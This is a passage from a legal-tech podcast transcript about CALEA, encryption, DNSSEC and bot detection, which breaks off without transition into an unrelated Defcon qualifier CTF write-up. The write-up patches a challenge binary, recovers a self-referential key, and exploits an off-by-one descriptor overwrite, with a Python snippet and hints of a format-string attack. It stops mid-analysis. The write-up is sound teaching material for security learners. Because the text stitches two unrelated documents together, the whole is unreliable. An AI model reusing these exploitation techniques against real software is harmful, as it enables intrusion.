Stewart: Okay, so maybe this is of a piece with the Administration’s strategy for negotiating with Russia, which is to hope that the Russians will come around. The Supreme Court had a ruling in the case we talked about a while ago; this is the guy who wrote really vile and threatening and scary things about his ex wife and the FBI agent who came to interview him and who said afterwards, after he’d posted on Facebook and was arrested for it, “Well, come on, I was just doing what everybody in hip hop does; you shouldn’t take it seriously. I didn’t,” and the Supreme Court was asked to decide whether the test for threatening action is the understanding of the writer or the understanding of the reader? At least that’s how I read it, and they sided with the writer, with the guy who wrote all those vile things. Michael, did you look more closely at that than I did?

Michael: The court read into it a requirement that the government has to show at least that the defendant sent the communication with the purpose of issuing a threat or with the knowledge that it would be viewed as a threat, and it wasn’t enough for the government to argue and a jury to find that a reasonable person would perceive it as a threat.

So you have to show at least knowledge or purpose or intent, and it left open the question whether recklessness as to how it would be perceived, was enough.

Stewart: All right; well, I’m not sure I’m completely persuaded but it probably also doesn’t have enough to do with CyberLaw in the end to pursue. Let’s close up with one last topic, which is the FBI is asking for or talking about expanding CALEA to cover social media, to cover communications that go out through direct messaging and the like, saying it’s not that we haven’t gotten cooperation from social media when we wanted it or a wiretap; it’s just that in many cases they haven’t been able to do it quickly enough and we need to set some rules in advance for their ability to do wiretaps.

This is different from the claim that they’re Going Dark and that they need access to encrypted communications; it really is an effort to actually change CALEA, which is the Communications Assistance Law Enforcement Act from 1994, and impose that obligation on cellphone companies and then later on voiceover IP providers. Jason, what are the prospects for this? How serious a push is this?


Jason: Well, prospects are – it’s DOA – but just to put it in a little bit of historical perspective. So Going Dark has of late been the name for the FBIs effort to deal with encryption, but the original use of that term, Going Dark was, at least in 2008/2009 when the FBI started a legislative push to amend CALEA and extend it to internet based communications, Going Dark was the term they used for that effort. They would cite routinely the fact that there was a very significant number of wiretaps in both criminal and national security case that providers that were not covered by CALEA didn’t have the technical capability to implement.

So it wasn’t about law enforcement having the authority to conduct a wiretap; they by definition has already definition had already developed enough evidence to satisfy a court that they could meet the legal standard. It was about the provider’s ability to help them execute that authority that they already had. As you suggested, either the wiretap couldn’t be done at all or the provider and the government would have to work together to develop a technical solution which could take months and months, by which time the target wasn’t using that method of communication anymore; had moved onto something else.

So for the better part of four years, my last four years at the department, the FBI was pushing along with DEA and some other agencies, for a massive CALEA reform effort to expand it to internet based communications. At that time – this is pre Snowden; it’s certainly truer now – but at that time it was viewed as a political non starter, to try to convince providers that CALEA should be expanded.

So they downshifted as a Plan B to try to amend Title 18, and I think there were some parallel amendments to Title 50, but the Title 18 amendments would have dramatically increased the penalties for provider who didn’t have the capability to implement a wiretap order, a valid wiretap order that law enforcement served.

There would be this graduating series of penalties that would essentially create a significant financial disincentive for a provider not to have in their sight capability in advance or to be able to develop one quite quickly. So the FBI, although it wanted CALEA to be expanded was willing to settle for this sort of indirect way to achieve the same thing; to incentivize providers to develop an intercept solutions.

That was an unlikely Bill to make it to the Hill and to make it through the Hill before Snowden; after Snowden I think it became politically plutonium. It was very hard even before Snowden to explain to people that this was not an effort to expand authorities; it was about executing those authorities. That argument became almost impossible to make in the post Snowden world.

What struck me about this story though is that they appear to be going back to Plan A, which is trying to go in the front door and expand CALEA, and the only thing I can interpret is either that the people running this effort now are unaware of the previous history that they went through, or they’ve just decided what the hell; they have nothing to lose. They’re unlikely to get it through anyway so they might as well ask for what they want.

Stewart: That’s my impression. There isn’t any likelihood in the next two years that encryption is going to get regulated, but the Justice Department and the FBI are raising this issue I think partly on what the hell, this is what we want, this is what we need, we might as well say so, and partly I think preparation of the battle space for the time when they actually have a really serious crime that everybody wishes had been solved and can’t be solved because of some of these technical gaps.

Dan: You know what drives me nuts is we’re getting hacked left and right; we’re leaking data left and right, and all these guys can talk about is how they want to leak more data. Like when we finish here this is about encryption. We’re not saying we’re banning encryption but if there’s encryption and we can’t get through it we’re going to have a graduated series of costs or we’re going to pull CALEA into this. There’s entire classes of software we need to protect American business that are very difficult to invest in right now. It’s very difficult to know, in the long term, that you’re going to get to run it.

Stewart: Well, actually my impression is that VCs are falling all over themselves to fund people who say, “Yeah, we’re going to stick it to the NSA.”

Dan: Yeah, but those of us who actually know what we’re doing, know whatever we’re doing, whatever would actually work, is actually under threat. There are lots of scammers out there; oh my goodness, there are some great, amazing, 1990s era snake oil going on, but the smart money is not too sure we’re going to get away with securing anything.

Stewart: I think that’s probably right; why don’t we just move right in because I had promised I was going to talk about this from the news roundup to this question – Julian Sanchez raised it; I raised it with Julian at a previous podcast. We were talking about the effort to get access to encrypted communications and I mocked the people who said, “Oh, you can never provide access without that; that’s always a bad idea.” And I said, “No, come on.” Yes, it creates a security risk and you have to manage it but sometimes the security risk and the cost of managing it is worth it because of the social values.

Dan: Sometimes you lose 30 years of background check data.

Stewart: Yeah, although I’m not sure they would have. I’m not sure how encryption, especially encryption of data in motion, would have changed that.

Dan: It’s a question of can you protect the big magic key that gives you access to everything on the Internet, and the answer is no.

Stewart: So let me point to the topic that Julian didn’t want to get into because it seemed to be more technical than he was comfortable with which is –

Dan: Bring it on.

Stewart: Exactly. I said, “Are you kidding me? End to end encryption?” The only end to end encryption that has been adopted universally on the internet since encryption became widely exportable is SSL/TLS. That’s everywhere; it’s default.

Okay, but SSL/TLS is broken every single day by the thousands, if not the millions, and it’s broken by respectable companies. In fact, probably every Fortune 500 company insists that SSL has to be broken at their firewall.

And they do it; they do it so that they can inspect the traffic to see whether some hacker is exfiltrating the –

Dan: Yeah, but they’re inspecting their own traffic. Organizations can go ahead and balance their benefits and balance their risks. When it’s an external actor it’s someone else’s risk. It’s all about externality.

Stewart: Well, yes, okay; I grant you that. The point is the idea that building in access is always a stupid idea, never worth it. It’s just wrong, or at least it’s inconsistent with the security practices that we have today. And probably, if anything, some of the things that companies like Google and Facebook are doing to promote SSL are going to result in more exfiltration of data. People are already exfiltrating data through Google properties because Google insists that they be whitelisted from these intercepts.

Dan: What’s increasingly happening is that corporations are moving the intercept and DLP and analytics role to the endpoint because operating it as a midpoint just gets slower and more fragile day after day, month after month, year after year. If you want security, look, it’s your property, you’re a large company, you own 30,000 desktops, they’re your desktops, and you can put stuff on them.

Stewart: But the problem that the companies have, which is weighing the importance of end to end encryption for security versus the importance of being able to monitor activity for security, they have come down and said, “We have to be able to monitor it; we can’t just assume that every one of our users is operating safely.” That’s a judgment that society can make just as easily. Once you’ve had the debate society can say, “You know, on the whole, ensuring the privacy of everybody in our country versus the risks of criminals misusing that data, we’re prepared to say we can take some risk on the security side to have less effective end to end encryption in order to make sure that people cannot get away with breaking the law with impunity.”

Dan: Here’s a thing though – society has straight out said, “We don’t want bulk surveillance.” If you want to go ahead and monitor individuals, you have a reason to monitor, that’s one thing but –

Stewart: But you can’t monitor all of them. If they’ve been given end to end – I agree with you – there’s a debate; I’m happy to continue debating it but I’ve lost so far. But you say, no, it’s this guy; this guy, we want to listen to his communications, we want to see what he is saying on that encrypted tunnel, you can’t break that just stepping into the middle of it unless you already own his machine.

Dan: Yeah, and it’s unfortunately the expensive road.

Stewart: because they don’t do no good.

Dan: isn’t there. It isn’t the actual thing.

Stewart: It isn’t here – I’m over at Stanford and we’re at the epicenter of a contempt for government, but everybody gets a vote. You get a vote if you live in Akron, Ohio too, but nobody in Akron gets a vote about where their end to end encryption is going to be deployed.

Dan: You know, look, average people, normal people have like eight secure messengers on their phone. Text messaging has fallen off a cliff; why? At the end of the day it’s because people want to be able to talk to each other and not have everyone spying on them. There’s a cost, there’s an actual cost to spying on the wrong people.

Stewart: There is?

Dan: If you go ahead and you make everyone your enemy you find yourself with very few friends. That’s how the world actually works.

Stewart: All right; I think we’ve at least agreed that there’s routine breakage of the one end to end encryption methodology that has been widely deployed. I agree with you, people are moving away from man in middle and are looking to find ways to break into systems at the endpoint or close to the endpoint. Okay; let’s talk a little bit, if we can, about DNSSEC because we had a great fight over SOPA and DNSSEC, and I guess the question for me is what – well, maybe you can give us two seconds or two minutes on what DNSSEC is and how it’s doing in terms of deployment.

Dan: DNSSEC, at the end of the day makes it as easy to get encryption keys as it is to get the address for a server. Crypto should not be drama. You’re a developer, you need to figure out how to encrypt something, hit the encrypt button, you move on with your life. You write your app. That’s how it needs to work.

DNS has been a fantastic success at providing addressing to the internet. It would be nice if keying was just as easy, but let me tell you, how do you go ahead and go out and talk to all these internet people about how great DNSSEC is when really it’s very clear DNS itself – it’s not like SOPA fights, it’s not going to come back –

Stewart: Yeah; well, maybe.

Dan: – and it’s not like the security establishment, which should be trying to make America safer, it’s like, “Man, we really want to make sure we get our keys in there.” When that happens [it doesn’t work]. It’s not that DNSSEC isn’t a great technology, but it really depends on politically [the DNS and its contents] being sacrosanct.

Stewart: Obviously, DHS, the OMB committed to getting DNSSEC deployed at the federal level, and so their enthusiasm for DNSSEC has been substantial. Are you saying that they have undermined that in some way that –

Dan: The federal government is not monolithic; two million employees, maybe more, and what I’m telling you is that besides the security establishment that’s keeping on saying, “Hey, we’ve got to be able to get our keys in there too,” has really – we’ve got this dual mission problem going on here. Any system with a dual mission, no one actually believes there’s a dual mission, okay.

If the Department of Transportation was like, “Maybe cars should cars should crash from time to time,” if Health or Human Services was like, “Hey, you know, polio is kind of cool for killing some bad guys.” No one would take those vaccines because maybe it’s the other mission and that’s kind of the situation that we have right here. Yeah, DNSSEC is a fantastic technology for key distribution, but we have no idea five years from now what you’re going to do with it, and so instead it’s being replaced with garbage [EDIT: This is rude, and inappropriate verbiage.]

I’m sorry, I know people are doing some very good work, but let me tell you, their value add is it’s a bunch of centralized systems that all say, “But we’re going to stand up to the government.” I mean, that’s the value add and it never scales, it never works but we keep trying because we’ve got to do something because it’s a disaster out there. And honestly, anything is better than what we’ve got, but what we should be doing is DNSSEC and as long as you keep making this noise we can’t do it.

Stewart: So DNSSEC is up to what? Ten percent deployment?

Dan: DNSSEC needs a round of investment that makes it a turnkey switch.

Stewart: Aah!

Dan: DNSSEC could be done [automatically] but every server just doesn’t. We [could] just transition the internet to it. You could do that. The technology is there but the politics are completely broken.

Stewart: Okay; last set of questions. You’re the Chief Scientist at WhiteOps and let me tell you what I think WhiteOps does and then you can tell me what it really does. I think of WhiteOps as having made the observation that the hackers who are getting into our systems are doing it from a distance. They’re sending bots into pack up and exfiltrate data. They’re logging on and bots look different from human beings when they type stuff and the people who are trying to manage an intrusion remotely also looks different from somebody who is actually on the network and what WhiteOps is doing is saying, “We can find those guys and stop them.”

Dan: And it’s exactly what we’re doing. Look, I don’t care how clever your buffer overflow is; you’re not teleporting in front of a keyboard, okay. That’s not going to happen. So our observation is that we have this very strong signal, it’s not perfect because sometimes people VPN in, sometimes people make scripted processes.

Stewart: But they can’t keep a VPN up for very long?

Dan: [If somebody is remotely] on the machine; you can pick it up in JavaScript. So you have a website that’s being lilypad accessed either through bulk communications with command and control to a bot, or through interaction with remote control, churns out weak signals that we’re able to pick up in JavaScript.

Stewart: So this sounds so sensible and so obvious that I guess my question is how come we took this long to have that observation become a company?

Dan: I don’t know but we built it. The reality is, is that it requires knowledge of a lot of really interesting browser internals. At WhiteOps we’ve been breaking browsers for years so we’re basically taking all these bugs that actually never let you attack the user but they have completely different responses inside of a bot environment. That’s kind of the secret sauce.

Every browser is really a core object that reads HTML 5, Java Scripted video, all the things you’ve got to do to be a web browser. Then there’s like this goop, right? Like it puts it on the screen, it has a back button, uses an address bar, and lets you configure stuff, so it turns out that the bots use the core not the goop.

Stewart: Oh yeah, because the core enables them to write one script for everything?

Dan: Yeah, so you have to think of bots as really terribly tested browsers and once you realize that it’s like, “Oh, this is barely tested, let’s make it break.”

Stewart: Huh! I know you’ve been doing work with companies looking for intrusions. You’ve also been working with advertisers; not trying to find people who are basically engaged in click fraud. Any stories you can tell about catching people on well guarded networks?

Dan: I think one story I really enjoy – we actually ran the largest study into ad fraud that had ever been done, of its nature. We found that there’s going to be about $6 billion of ad fraud at http://whiteops.com/botfraud, and we had this one case, so we tell the world we’re going to go ahead and run this test in August and find all the fraud. You know what? We lied. We do that sometimes.

We actually ran a test from a little bit in July, all the way through September and we watched this one campaign; 40 percent fraud, then when we said we were going to start, three percent fraud. Then when we said we’re going to start, back to 40. You just had this square wave. It was the most beautiful demo. We showed this to the customers – one of the biggest brands in the country – and they were just like, “Those guys did what?”

And here’s what’s great – for my entire career I’ve been dealing with how people break in. This bug, that bug, what’s wrong with Flash, what’s wrong with Java? This is the first time in my life I have ever been dealing with why. People are doing this fraud to make money. Let’s stop the checks from being written? It’s been incredibly entertaining.

Stewart: Oh, that it is; that’s very cool, and it is – I guess maybe this is the observation. We wasted so much time trying to keep people out of systems hopelessly; now everybody says, “Oh, you have to assume they’re in,” but that doesn’t mean you have the tools to really deal with them, and this is a tool to deal with people when they’re in.

Dan: There’s been a major shift from prevention to detection. We basically say, “Look, okay, they’re going to get in but they don’t necessarily know what perfectly to do once they’re in.” Their actions are fundamentally different than your legitimate users and they’re always going to be because they’re trying to do different things; so if you can detect properties of the different things that they’re doing you actually have signals, and it always comes down to signals in intelligence.

Stewart: Yeah; that’s right. I’m looking forward to NSA deploying WhiteOps technology, but I won’t ask you to respond to that one. Okay, Dan, this was terrific I have to say. I’d rather be on your side of an argument than against you, but it’s been a real pleasure arguing this out. Thanks for coming in Michael, Jason; I appreciate it.

Just to close up the CyberLaw Podcast is open to feedback. Send comments to cyberlawpodcast@steptoe.com; leave a message at 202 862 5785. I’m still waiting for an entertainingly abusive voicemail. We haven’t got them. This has been episode 70 of the Steptoe CyberLaw Podcast brought to by Steptoe & Johnson. Next week we’re going to be joined by Catherine Lotrionte, who is the Associate Director of the Institute for Law, Science and Global Security at Georgetown. And coming soon we’re going to have Jim Baker, the General Counsel of the FBI; Rob Knake, a Senior Fellow for Cyber Policy at the Council on Foreign Relations. We hope you’ll join us next week as we once again provide insights into the latest events in technology, security, privacy in government.

Defcon quals: wwtw (a series of vulns)

Hey folks,

This is going to be my final (and somewhat late) writeup for the Defcon Qualification CTF. The level was called "wibbly-wobbly-timey-wimey", or "wwtw", and was a combination of a few things (at least the way I solved it): programming, reverse engineering, logic bugs, format-string vulnerabilities, some return-oriented programming (for my solution), and Dr. Who references!

I'm not going to spend much time on the theory of format-string vulnerabilities or return-oriented programming because I just covered them in babyecho and r0pbaby.

And by the way, I'll be building the solution in Python as we go, because the first part was solved by one of my teammates, and he's a Python guy. As much as I hated working with Python (which has become my life lately), I didn't want to re-write the first part and it was too complex to do on the shell, so I sucked it up and used his code.

You can download the binary here, and you can get the exploit and other files involved on my github page.

Part 1: The game

The first part's a bit of a game. I wasn't all that interested in solving it, so I patched it out (see the next section) and discovered that there was another challenge I could work on while my teammate solved the game. This is going to be a very brief overview of my teammate's solution.

When you start wwtw, you will see this:

You(^V<>) must find your way to the TARDIS(T) by avoiding the angels(A).
Go through the exits(E) to get to the next room and continue your search.
But, most importantly, don't blink!
   012345678901234567890
00        <
01
02  A
03
04            A
05
06                AA
07    A        A
08 A
09
10  A     A
11                  A
12                 A
13
14                    A
15    A
16 A   A              E
17
18                A
19  A
Your move (w,a,s,d,q):

After a few seconds, it times out. The timeout can be patched out, if you want, but the timeouts are actually somewhat important in this level as we'll see later.

You can move around your character using the w,a,s,d keys, as indicated in the little message. Your goal is to reach the tardis - represented by a 'T' - by going through the exits - represented by 'E's - and avoiding the angels - represented by 'A's. The angels will follow you when your back is turned. This stuff is, of course, a Dr. Who reference. :)

The solution to this was actually pretty straight forward: a greedy algorithm that makes the "best" move toward the exit to a square that isn't occupied by an angel works 9 times out of 10, so we stuck with that and re-ran it whenever we got stuck in a corner or along the wall.

You can see the code for it in the exploit. I'm not going to dwell on that part any longer.

Part 1b: skipping the game

As I said, I didn't want to deal with solving the game, I wanted to get to the good stuff (so to speak), so I "fixed" the game such that every move would appear to be a move to the exit (it would be possible to skip the game part entirely, but this was easy and worked well enough).

This took a little bit of trial and error, but I primarily used the failure message - "Enjoy 1960..." - to figure out where in the binary to look.

If you look at all the places that string is found (in IDA, use shift-f12 or just search for it), you'll find one that looks like this:

.text:00002E14          lea     eax, (aEnjoy1960____0 - 5000h)[ebx] ; "Enjoy 1960..."

If you look back a little bit, you'll find that the only way to get to that line is for this conditional jump to occur:

.text:00002DC0 83 7D F4 01                             cmp     [ebp+var_C], 1
.text:00002DC4 75 48                                   jnz     short loc_2E0E

It's pretty easy to fix that, you can simply replace the jnz - 75 48 - with nops - 90 90. Here's a diff:

--- a   2015-06-03 17:09:22.000000000 -0700
+++ b   2015-06-03 17:09:44.000000000 -0700
@@ -3635,7 +3635,8 @@
     2db8:      e8 7f ed ff ff          call   1b3c <main+0x937>
     2dbd:      89 45 f4                mov    %eax,-0xc(%ebp)
     2dc0:      83 7d f4 01             cmpl   $0x1,-0xc(%ebp)
-    2dc4:      75 48                   jne    2e0e <main+0x1c09>
+    2dc4:      90                      nop
+    2dc5:      90                      nop
     2dc6:      8d 83 e0 00 00 00       lea    0xe0(%ebx),%eax
     2dcc:      8b 00                   mov    (%eax),%eax
     2dce:      83 f8 03                cmp    $0x3,%eax

Aside: Making the binary debug-able

Just as a quick aside: this program is a PIE - position independent executable - which means the addresses you see in IDA are all relative to 0. But when you run the program, it's assigned a "proper" address, even if ASLR is off. I don't know if there's a canonical way to deal with that, but I personally use this little trick in addition to turning off ASLR:

  1. Replace the first instruction in the start() or main() function with "\xcc" (software breakpoint) (and enough nop instructions to overwrite exactly one instruction)
  2. Run it in a debugger such as gdb
  3. (Optionally) use a .gdbinit file that automatically resumes execution when the breakpoint is hit

Here's the first line of start() in wwtw:

.text:00000A60 31 ED                                   xor     ebp, ebp

Since it's a two byte instruction ("\x31\xED"), we open the binary in a hex editor and replace those two bytes with "\xcc\x90" (the "\x90" being a nop instruction). If you try to execute it after that change, you should see this if you did it right:

$ ./wwtw-blog
Trace/breakpoint trap

And with a debugger, you can continue execution after that breakpoint:

$ gdb -q ./wwtw-blog
(gdb) run
Starting program: /home/ron/defcon-quals/wwtw/wwtw-blog

Program received signal SIGTRAP, Trace/breakpoint trap.
0x56555a61 in ?? ()
(gdb) cont
Continuing.
You(^V<>) must find your way to the TARDIS(T) by avoiding the angels(A).
Go through the exits(E) to get to the next room and continue your search.
[...]

You can also use a gdbinit file:

$ echo -e 'run\ncont' > gdbhax
$ gdb -q -x ./gdbhax ./wwtw-blog
Program received signal SIGTRAP, Trace/breakpoint trap.
0x56555a61 in ?? ()
You(^V<>) must find your way to the TARDIS(T) by avoiding the angels(A).
Go through the exits(E) to get to the next room and continue your search.
But, most importantly, don't blink!
[...]

Part 2: Starting the ignition (by debugging)

After you complete the fifth room and get to the Tardis, you're prompted for a key:

TARDIS KEY: abcd
Wrong key!
Enjoy 1960...
$ bcd

Funny story: I had initially nop'd out the failure condition when I was trying to nop out the "you've been eaten by an angel" code from earlier, so it actually took me awhile to even realize that this was a challenge. I had accidentally set it to - as I describe in the next section - accept any password. :)

Anyway, one thing you'll notice is that when it prompts you for the key, you can type in multiple characters, but after it kicks you out it prints all but the first character on the commandline. That's interesting, because it means that it's only consuming one character at a time and is therefore vulnerability to a bunch of attacks. If you happen to guess a correct character, it consumes one more:

TARDIS KEY: Uabcd
Wrong key!
Enjoy 1960...
$ bcd

(Note that it consumed both the "U" and the "a" this time)

Because it's checking one character at a time, it's pretty easy to guess it one character at a time - 62 max tries per character (31 on average) and a 10-character string means it could be guessed in something like 600 - 1000 runs. But we can do better than that!

I searched the source in IDA for the string "TARDIS KEY:" to get an idea of where to look for the code. You will find it at 0x00000ED1, which is in a fairly short function called from main(). In it, you'll see a call to both read() and getchar(). But more importantly, in the whole function, there's only one "cmp" instruction that takes two registers (as opposed to a register and an immediate value (ie, constant)):

.text:00000F45 39 C2                                   cmp     edx, eax

If I had to take a wild guess, I'd say that this function somehow verifies the password you type in using that comparison. And if we're lucky, it'll be a comparison between what we typed and what they expected to see (it doesn't always work out that way, but when it does, it's awesome).

To set a breakpoint, we need to know which address to break at. The easiest way to do that is to disable ASLR and just have a look at what address stuff loads to. It shouldn't change if ASLR is off.

On my machine, wwtw loads to 0x56555000, which means that comparison should be at 0x56555000 + 0x00000f45 = 0x56555f45. We can verify in gdb:

(gdb) x/i 0x56555f45
   0x56555f45:  cmp    edx,eax

We want to put a breakpoint there and print out both of those values to make sure that one is what we typed and the other isn't. I added the breakpoint to my gdbhax file because I know I'm going to be using it over and over:

$ cat gdbhax
run
b *0x56555f45
cont

And run the process (punching in whatever you want for the five moves, since we've already "fixed" the game):

$ gdb -q -x ./gdbhax ./wwtw-blog
[...]
Program received signal SIGTRAP, Trace/breakpoint trap.
0x56555a61 in ?? ()
Breakpoint 1 at 0x56555f45
You(^V<>) must find your way to the TARDIS(T) by avoiding the angels(A).
Go through the exits(E) to get to the next room and continue your search.
But, most importantly, don't blink!

[...]

TARDIS KEY: a

Breakpoint 1, 0x56555f45 in ?? ()
(gdb)
(gdb) print/c $edx
$2 = 65 'a'
(gdb) print/c $eax
$3 = 85 'U'
(gdb)

It's comparing the first character we typed ("a") to another character ("U"). Awesome! Now we know that at that comparison, the proper character is in $eax, so we can add that to our gdbhax file:

$ cat gdbhax
run
b *0x56555f45

cont

while 1
  print/c $eax
  cont
end

That little script basically sets a breakpoint on the comparison, then each time it breaks it prints eax and continues execution.

When you run it a second time, we start with "U" and then whatever other character so we can get the second character:

$ gdb -q -x ./gdbhax ./wwtw-blog
[...]
TARDIS KEY: Ua

Breakpoint 1, 0x56555f45 in ?? ()
$1 = 85 'U'

Breakpoint 1, 0x56555f45 in ?? ()
$2 = 101 'e'
Wrong key!

Then run it again with "Ue" at the start:

Breakpoint 1, 0x56555f45 in ?? ()
$1 = 85 'U'

Breakpoint 1, 0x56555f45 in ?? ()
$2 = 101 'e'

Breakpoint 1, 0x56555f45 in ?? ()
$3 = 83 'S'

...and so on. Eventually, you'll get the key "UeSlhCAGEp". If you try it, you'll see it works:

TARDIS KEY: UeSlhCAGEp
Welcome to the TARDIS!
Your options are:
1. Turn on the console
2. Leave the TARDIS

Part 2b: Without brute force

Usually in CTFs, if a password or key is English-looking text, it's probably hardcoded, and if it's random looking, it's generated. Since that key was obviously not English, it stands to reason that it's probably generated and therefore would not work against the real service. At this point, my teammate hadn't solved the "game" part yet, so I couldn't easily test against the real server. Instead, I decided to dig a bit deeper to see how the key was actually generated. Spoiler: it doesn't actually change, so this wound up being unnecessary. There's a reason I take a long time to solve these levels. :)

At the start of the function that references the "TARDIS KEY:" string (the function contains, but doesn't start at, address 0x00000ED1), you'll see this line:

.text:00000EEF        lea     eax, (check_key - 5000h)[ebx]

Later, that variable is read, one byte at a time:

.text:00000EFA top_loop:                               ; CODE XREF: check_key+A4j
.text:00000EFA                 mov     eax, [ebp+key_thing]
.text:00000EFD                 movzx   eax, byte ptr [eax]
.text:00000F00                 movsx   eax, al
.text:00000F03                 and     eax, 7Fh
.text:00000F06                 mov     [esp], eax      ; int
.text:00000F09                 call    _isalnum

At each point, it reads the next byte, ANDs it with 0x7F (clearing the uppermost bit), and calls isalnum() on it to see if it's a letter or a number. If it's a valid letter or number, it's considered part of the key; if not, it's skipped.

It took me far too long to see what was going on: the function I called check_key() actually references itself and reads its own code! It reads the first dozen or so bytes from the function's binary and compares the alpha-numeric values to the key that was typed in.

To put it another way: if you look at the start of the function in a hex editor, you'll see:

55 89 E5 53 83 EC 24 E8 DC FB FF FF 81 C3 3C 41...

If we AND each of these values by 0x7F and convert them to a character, we get:

1.9.3-p392 :004 > "55 89 E5 53 83 EC 24 E8 DC FB FF FF 81 C3 3C 41".split(" ").each do |i|
1.9.3-p392 :005 >     puts (i.to_i(16) & 0x7F).chr
1.9.3-p392 :006?>   end
U

e
S

l
$
h
\
{



C
<
A

If you exclude the values that aren't alphanumeric, you can see that the first 16 bytes becomes "UeSlhCA", which is the first part of the code to start the engine!

Satisfied that it wasn't random, I moved on.

Aside: Why did they use the function as the key?

Just a quick little note in case you're wondering why the function used itself to generate the password...

When you set a software breakpoint (which is by far the most common type of breakpoint), behind the scenes the debugger replaces the instruction with a software breakpoint ("\xcc"). After it breaks, the real instruction is briefly replaced so the program can continue.

If you break on the first line of the function, then instead of the first line of the function being "\x55", which is "pop ebp", it's "\xCC" and therefore the value will be wrong. In fact, putting a breakpoint anywhere in the first ~20 bytes of that function will cause your passcode to be wrong.

I suspect that this was used as a subtle anti-debugging technique.

Part 2c: Skipping the password check

Much like the game, I didn't want to have to deal with entering the password each time around, so I found the call that checks whether or not that password was valid:

.text:0000125E                 test    eax, eax
.text:00001260                 jz      short loc_129C
.text:00001262                 lea     eax, (aWrongKey - 5000h)[ebx] ; "Wrong key!"

And switched the jz ("\x74\x3a") to a jmp ("\xeb\x3a"). Once you've done that, you can type whatever you want (including nothing) for the key.

Part 3: Time travelling

Now that you've started the Tardis, there's another challenge: you can only turn on the console during certain times:

Welcome to the TARDIS!
Your options are:
1. Turn on the console
2. Leave the TARDIS
Selection: 1
Access denied except between May 17 2015 23:59:40 GMT and May 18 2015 00:00:00 GMT

Looking around in IDA, I see some odd stuff happening. For example, the program attempts to connect to localhost on a weird port and read some data from it! The function that does that is called sub_CB0() if you want to have a look. After it connects, it sets up an alarm() that calls sub_E08() every 2 seconds. In that function, it reads 4 bytes from the socket and stores them. Those 4 bytes turned out to be a timestamp.

Basically, it has a little timeserver running on localhost that sends it the current time. If we can make it use a different server, we can provide a custom timestamp and bypass this check. But how?

I played around quite a bit with this, but I didn't make any breakthroughs till I ran it in strace.

To run the program in strace, we no longer need the debugger, so we have to fix the first two bytes of start():

.text:00000A60 31 ED                                   xor     ebp, ebp

and run strace on it to see what's going on:

socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 3
setsockopt(3, SOL_SOCKET, SO_RCVTIMEO, "\0\0\0\0\350\3\0\0", 8) = 0
connect(3, {sa_family=AF_INET, sin_port=htons(1234), sin_addr=inet_addr("127.0.0.1")}, 16) = 0
write(3, "\0", 1)                       = 1
read(3, 0xffffcd88, 4)                  = -1 ECONNREFUSED (Connection refused)
[...]
--- SIGALRM {si_signo=SIGALRM, si_code=SI_KERNEL, si_value={int=111, ptr=0x6f}} ---
write(3, "\0", 1)                       = 1
read(3, 0xffffc6d8, 4)                  = -1 ECONNREFUSED (Connection refused)
alarm(2)                                = 0
sigreturn() (mask [])                   = 3
read(0, 0x5655a0b0, 9)                  = ? ERESTARTSYS (To be restarted if SA_RESTART is set)
[...]

Basically, it makes the connection and gets a socket numbered 3. Every 2 seconds, it reads a timestamp from the socket. One of the first things I often do while working on CTF challenges is disable alarm() calls, but in this case it was actually needed! I suspected that this is another anti-debugging measure - to catch people who disabled alarm() - and therefore I should look for the vulnerability in the callback function.

It turns out there wasn't really that much code, but the vulnerability was somewhat subtle and I didn't notice until I ran it in strace and typed a bunch of "A"s:

read(0, AAAAAAAAAAAAAAAAAAAAAAAA
"AAAAAAAAA", 9)                 = 9
write(1, "Invalid\n", 8Invalid
)                = 8
[...]
--- SIGALRM {si_signo=SIGALRM, si_code=SI_KERNEL, si_value={int=111, ptr=0x6f}} ---
write(65, "\0", 1)                      = -1 EBADF (Bad file descriptor)
read(65, 0xffffc6d8, 4)                 = -1 EBADF (Bad file descriptor)
alarm(2)                                = 0
[...]

When I put a bunch of "A"s into the prompt, it started reading from socket 65 (aka, 0x41 or "A") instead of from socket 3! There's an off-by-one vulnerability that allows you to change the socket identifier!

If you were to use "AAAAAAAA\0", it would overwrite the socket with a NUL byte, and instead of reading from socket 3 or 65, it would read from socket 0 - stdin. The very same socket we're already sending data to!

Here's the python code to exploit this:

sys.stdout.write("01234567\0")
sys.stdout.flush()

time.sleep(2) # Has to be at least 2

sys.stdout.write("\x6d\x2b\x59\x55")
sys.stdout.flush()

That hex value is a timestamp during the prescribed time. When it reads that from stdin rather than from the socket it opened, it thinks the time is right and we can then activate the TARDIS!

Part 3b: Skipping the timestamp check

Once again, in the interest of being able to test without waiting 2 seconds every time, we can disable the timestamp check altogether. To do that, we find the error message:

.text:00001409  lea     eax, (aAccessDeniedEx - 5000h)[ebx] ; "Access denied except between %s and %s\"...

...and look backwards a little bit to find the jump that gets you there:

.text:000013BE E8 45 FA FF FF      call    check_timestamp
.text:000013C3 85 C0               test    eax, eax
.text:000013C5 74 2F               jz      short loc_13F6
.text:000013C7 8D 83 22 E1 FF FF   lea     eax, (aTheTardisConso - 5000h)[ebx] ; "The TARDIS console is online!"

And make sure it never happens (by replacing "\x74\x2F" with "\x90\x90"). Now we can jump directly to pressing "1" to active the TARDIS and it'll come right online:

$ ./wwtw-blog-nodebug
[...]
Welcome to the TARDIS!
Your options are:
1. Turn on the console
2. Leave the TARDIS
Selection: 1
The TARDIS console is online!Your options are:
1. Turn on the console
2. Leave the TARDIS
3. Dematerialize
Selection:

Part 4: Getting the coordinates

When we select option 3, we're prompted for coordinates:

Your options are:
1. Turn on the console
2. Leave the TARDIS
3. Dematerialize
Selection: 3
Coordinates: 1,2
1.000000, 2.000000
You safely travel to coordinates 1,2

If you look at the function that contains the "You safely travel..." string, you'll see that one of three things can happen:

  • It prints "Invalid coordinates" if you put anything other than two numbers (as defined by strtof() returning with no error, which means we can put a number then text without being "caught")
  • It prints "You safely travel to coordinates [...]" if you put valid coordinates
  • It prints "XXX is occupied by another TARDIS" if some particular set of coordinates are entered

The "XXX" in the output is actually the coordinates the user typed, as a string, passed directly to printf(). And we remember why printf(user_string) is bad, right? (Hint: format string attacks)

The function to calculate the coordinates used a bunch of floating point math, which made me sad - I don't really know how to reverse floating point stuff, and I don't really want to learn in the middle of a level. Fortunately, I noticed that two global variables were used:

.text:0000112B                 fld     ds:(dbl_3170 - 5000h)[ebx]
[...]
.text:00001153                 fld     ds:(dbl_3178 - 5000h)[ebx]

And if you look at the variables, you'll see:

.rodata:00003170 dbl_3170        dq 51.492137            ; DATA XREF: do_jump_EXPLOITME+104r
